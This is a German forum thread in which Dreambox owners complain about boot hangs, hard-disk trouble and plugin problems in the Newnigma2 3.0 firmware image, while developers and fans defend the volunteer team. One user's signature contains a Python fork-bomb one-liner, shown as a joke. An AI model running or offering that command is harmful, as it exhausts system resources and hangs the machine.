Nicht ausgereift ???

• Nicht ausgereift ???

Hy @ll,

ich frage mich langsam was man bei NE 3.0 getestet hat. Ich habe selten so viele Posts
      gelesen die auf massive Probleme hindeuten wie bei diesem Release.

Gibt es mit dem neuen Image (3.0) Bootprobleme? Meine Box bleibt bei "Starting..." mit ca. 5 von 6 Kuchenteilen stehen... Ist da was bekannt? - Hab schon 2 Mal geflasht. Festplatte lässt hin und wieder mal was von sich hören - passiert aber eben nix!

Hab genau das gleiche Problem. Box bleibt bei "starting" hängen und Balken bleibt unter dem M von Multimedia stehen. Das "Blaue Image 5.0" und "Newnigma2 unstable" funktionieren. Habs auch schon über WebIf und DreamUp ein paar mal geflasht. Aber immer das gleiche.

Genauso ist es bei mir auch, die meisten Plugins lassen sich nicht deinstallieren. Im Erweiterungsmenü bekomme ich auch keine Plugins zum Installieren oder deinstallieren angezeigt.

Auch bei mir mit meiner Samsung EcoGreen 1 TB Platte geht über das "starting" nichts hinaus. Für ein final Release auf Basis von OE 1.6 scheint es mir zu früh zu sein. Wenn er Kernel so mieß ist, dass er Probleme mit den Festplatten verursacht, gehört sowas nicht in eine Final und ist allein bei den unstable Images gut aufgehoben.

So, und auch bei mir war es so, daß nach dem Installieren der Kuchen bei 4/5 stehen geblieben ist.
      Keine Ahnung was da los ist, ich bin jedenfalls erst mal wieder zurück auf 2.8

Sorry, ich habs leider im falschen Tread gepostet, kann das mal jemand nach Dream 8000 verschieben ??

Grüße Rooki

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von rooki_1 ()

• 1. wer lesen kann ist klar im vorteil wegen der plugins deinstallieren und installieren geht schon lange nicht mehr..

2. mit den festplatten gibts auch ein beitrag anstatt meckern modell etc angeben und gucken was wir rausfinden. meinst du allen ernstes das wir jedes erdenkliches modell haben. zur not schickt uns platten!!!

3. wenn sie nicht startet kann es nur an ein paar dingen liegen platte oder ......
    • RE: Nicht ausgereift ???

Original von rooki_1
      Hy @ll,

ich frage mich langsam was man bei NE 3.0 getestet hat. Ich habe selten so viele Posts
      gelesen die auf massive Probleme hindeuten wie bei diesem Release.

Natuerlich haben wir die Bugs alle extra drin gelassen, damit Leute wie Du was zu meckern haben! :P :P :P

... und natuerlich gleich auch noch verwundert ueber das Echos sein. *fg*
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • Original von pinhead
      Dass das neu Image voller Bugs ist sieht man doch schon im neuen Banner! :D
      ...is ja schließlich ein schöner Käfer zu sehen.... :D
      =) =) =) :P :P :P

Der ist richtig gut ^^

@ rooki_1
      Ich würde sagen es steht dir frei ein anderes "Bug freies" Image zu nutzen xD
      Warning-clone box detected-system stop
      contact your dealer-adios amigo!
    • von welchem Kuchen wird da geredet ??? Hab ich den Newnigma Kaffee Kranz verpasst ?

aber ich denke mal: "Nicht ausgereift ???" bezieht sich er auf das Posting des Posters, der den Thread erstellt hat.
      Probleme kann man niemals mit derselben Denkweise lösen.

¯\_(ツ)_/¯

"Die Deutsche Rechtschreibung ist Freeware, sprich, du kannst sie kostenlos nutzen.
      Allerdings ist sie nicht Open Source, d.h. du darfst sie nicht verändern oder in veränderter Form veröffentlichen."

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von deepblue2000 ()

• RE: Majestäts-Beleidigung

Original von Èowyn
      Jegliche Kritik an Newnigma ist mit "Majestäts-Beleidigung" gleichzusetzen und ruft die "Wadel-Beißer" auf den Plan!

ROFL... wenn du das sagst... vielleicht macht ihr euch mal Gedanken was ihr hier macht.. passt euch was nicht, dann geht halt weiter... Die Leute hinter den Kulissen machen das "freiwillig" in ihrer Freizeit, was erwartet ihr da? Das ihr IMMER ein Ergebnis bekommt das selbst Riesen Unternehmen nicht hinbekommen? Gn8 ^^
      Zudem ist die mehr wohl sehr zufrieden mit dem neuen Image, also wo ist das Problem?

LG

Original von oZxS
      das ist fuer uns irgendwie fast full-time-job geworben ..

ja keine ahnung wie das passieren konnte ist wie ein sog kaum kommt man von der arbeit heim
      schon sitzt man vor der glotze und regt sich über die bedienung auf ..................
      » time to say goodbye «

Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.

Newnigma ist seit der Version 2.8.4 (für mich) immer schlechter geworden!

Was bringt eigentlich der ganze OE 1.6-Rummel praktisch?
      Einige für mich unverzichtbare PlugIns laufen nicht mehr.

Ich finde es schade, daß das ehemals mit Abstand beste Enigma-Image jetzt kaputt gespielt wird!
      Gruß Èowyn

plugins laufen alle musste nur per opkg install *.ipk installieren. ich wuesste keins was so nicht geht. dann sag doch welches nicht geht. der trouble darum ist, dass es irgendwann mal einen neueren kernel gibt der auch mehr usb-geraete unterstuetzt wie wlan-n oder dvb-usb-tuner etc.

schlechter ? mh bei mir laufen die images immer besser ..

Original von oZxS
      plugins laufen alle musste nur per opkg install *.ipk installieren. ich wuesste keins was so nicht geht. dann sag doch welches nicht geht. der trouble darum ist, dass es irgendwann mal einen neueren kernel gibt der auch mehr usb-geraete unterstuetzt wie wlan-n oder dvb-usb-tuner etc.

schlechter ? mh bei mir laufen die images immer besser ..

Da kann ich dir nur zustimmen. :D
      Bin zwar ein Anfänger was Enigma 2 betrifft --> doch zufrieden damit. :)
      Für mich von der Bedienung derzeit sicher eines der besten Images(OoZooN ist auch cool)

Original von oZxS
      plugins laufen alle musste nur per opkg install *.ipk installieren. ich wuesste keins was so nicht geht. dann sag doch welches nicht geht. . .

Im Unstable gingen u.a. "Apple Movie Trailers" und "TuxCom" nicht.
      Im Feed sollten alle funktionierenden PlugIns schon enthalten sein.

Original von oZxS
      . . . der trouble darum ist, dass es irgendwann mal einen neueren kernel gibt der auch mehr usb-geraete unterstuetzt wie wlan-n oder dvb-usb-tuner etc. . . .

. . . und weniger Festplatten!

Lass es mich mal so sagen:
      Es gibt IMO Linux-Freaks und DVB-Fans.

Ich habe mir die Dreambox gekauft, weil ich die Nase von der miesen IPBox-Software und der Tideglo-Eigenbrötlerei voll hatte.

IMO entwickelt sich Newnigma² in letzter Zeit in Richtung "von Linux-Freaks - für Linux-Freaks!"

Ich zähle mich zu den "DVB-Fans" mit großen DX-Interesse (5°W-30°W).
      Die Dreamboxen finde ich zu schade als Hardware nur für Linux-Freaks.
      Dafür gibt es doch das Duck-Box-Projekt (oder ?).
      Gruß Èowyn

jop das mit den festplatten stimmt. aber das aendert sich auch wieder wenn der kernel noch atkueller wird.

unstable = ist ja nicht 3.o. wenn probleme mit dem unstable sind, gehoert das ja nicht hier hin.

das problem wird sein, dass die entwicklung des oe 1.5 denke ich mal auf kurz oder lang eingestellt wird.

es ist deine auffassung, dass es fuer linux freaks von linux freaks ist. teilen tue ich sie nicht. aber wir verbieten hier keinem das wort.

fuer mich persoenlich lohnt sich irgendwie der ganze aufwand nicht, man hoert ja nur geht nicht, geht nicht. frag mich ueberhaupt noch, ob ich mir das noch antun muss.

Original von oZxS
      jop das mit den festplatten stimmt. aber das aendert sich auch wieder wenn der kernel noch atkueller wird.

unstable = ist ja nicht 3.o. wenn probleme mit dem unstable sind, gehoert das ja nicht hier hin.

das problem wird sein, dass die entwicklung des oe 1.5 denke ich mal auf kurz oder lang eingestellt wird.

es ist deine auffassung, dass es fuer linux freaks von linux freaks ist. teilen tue ich sie nicht. aber wir verbieten hier keinem das wort.

fuer mich persoenlich lohnt sich irgendwie der ganze aufwand nicht, man hoert ja nur geht nicht, geht nicht. frag mich ueberhaupt noch, ob ich mir das noch antun muss.

99% aller bugs sitzen zwischen couch und box :P :P :P
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

Original von Èowyn

Ich zähle mich zu den "DVB-Fans" mit großen DX-Interesse (5°W-30°W).
      Die Dreamboxen finde ich zu schade als Hardware nur für Linux-Freaks.
      Dafür gibt es doch das Duck-Box-Projekt (oder ?).

Es gibt aber scheinbar genug DVB-Fans mit DX-Interesse, die sich nicht zu den Linux Freaks zaehlen und denen das Image auch mit OE1.6 gefaellt.
      Die sind scheins aber auch selbst in der Lage (oder gewillt) Plugins, die nicht auf dem Feed liegen, manuell zu installieren. So schlecht kann es also nicht sein.
      Und ein paar Unken gibt es immer, die ewig was zu noergeln haben und meinen "Frueher war alles besser".
      Das OE1.6 ist auf dem besten Weg stabil und sehr gut bedienbar zu werden. OE1.5 war am Anfang auch nicht besser und da wurde auch gemeckert.
      "Remember, if it's psychobilly, it's gotta have some rockabilly in it somwhere. It ain't just punk with a double bass." (P.Paul Fenech)
    • Alles was der "Bauer" nicht kennt ist schlecht... :rolleyes:
      Und Leute die Meckern wird es IMMER geben.
      Ich kann nur sagen wer ein Problem mit dem neuen Image soll halt das alte V2 nehmen, oder gleich ein ganz anderes.
      Alternativ könnte man ja mal einfach abwarten bis man sich an das "neue" gewöhnt hat. 8)

Ich kann nur sagen macht weiter so ;)

DANKE NG-Team :)